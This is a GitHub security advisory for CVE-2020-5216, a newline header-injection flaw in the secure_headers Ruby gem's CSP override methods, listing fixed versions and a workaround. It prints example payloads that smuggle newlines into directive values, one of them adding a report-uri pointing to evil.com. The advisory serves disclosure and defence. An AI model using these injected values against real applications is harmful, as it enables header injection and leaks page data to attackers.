GitHub Advisoryadvisory · RubyGems
GHSA-w978-rmpf-qmwg Limited header injection when using dynamic overrides with user input in RubyGems secure_headers
MEDIUM
Official page ↗
- Aliases
- CVE-2020-5216
- Ecosystem
- RubyGems
- Packages
- secure_headers
- Severity
- Moderate
- CVSS vector
- CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N
- Weaknesses
- CWE-113
- Reviewed
- 2020-01-23
Affected packages
• RubyGems secure_headers: >= 6.0.0, < 6.3.0 → fixed in 6.3.0
• RubyGems secure_headers: >= 5.0.0, < 5.2.0 → fixed in 5.2.0
• RubyGems secure_headers: < 3.9.0 → fixed in 3.9.0
Description
Impact
If user-supplied input was passed into append/override_content_security_policy_directives, a newline could be injected leading to limited header injection.
Upon seeing a newline in the header, rails will silently create a new `Content-Security-Policy` header with the remaining value of the original string. It will continue to create new headers for each newline.
e.g.
```ruby
override_content_security_directives(script_src: ['mycdn.com', "\ninjected\n"])`
```
would result in
```
Content-Security-Policy: ... script-src: mycdn.com
Content-Security-Policy: injected
Content-Security-Policy: rest-of-the-header
```
CSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial:
```ruby
override_content_security_directives(script_src: ["mycdn.com", "\ndefault-src 'none'; report-uri evil.com"])
```
```
Content-Security-Policy: ... script-src: mycdn.com
Content-Security-Policy: default-src 'none'; report-uri evil.com
Content-Security-Policy: rest-of-the-header
```
Patches
This has been fixed in 6.3.0, 5.2.0, and 3.9.0
Workarounds
```ruby
override_content_security_policy_directives(:frame_src, [user_input.gsub("\n", " ")])
```
References
https://github.com/twitter/secure_headers/security/advisories/GHSA-xq52-rv6w-397c
The effect of multiple policies
For more information
If you have any questions or comments about this advisory:
• Open an issue in this repo
• DM us at @ndm on twitter
Related
Alias · CVE (1)
- CVE-2020-5216 In Secure Headers (RubyGem secure_headers), a directive injection vulnerability is present in versions before 3.9.0, 5.2.0, and 6.3.0. vulnerability
Weakness · CWE (1)
- CWE-113 Improper Neutralization of CRLF Sequences in HTTP Headers weakness
References
- https://github.com/twitter/secure_headers/security/advisories/GHSA-w978-rmpf-qmwg web
- https://nvd.nist.gov/vuln/detail/CVE-2020-5216 advisory
- https://github.com/twitter/secure_headers/commit/301695706f6a70517c2a90c6ef9b32178440a2d0 web
- https://github.com/rubysec/ruby-advisory-db/blob/master/gems/secure_headers/CVE-2020-5216.yml web
- https://github.com/twitter/secure_headers package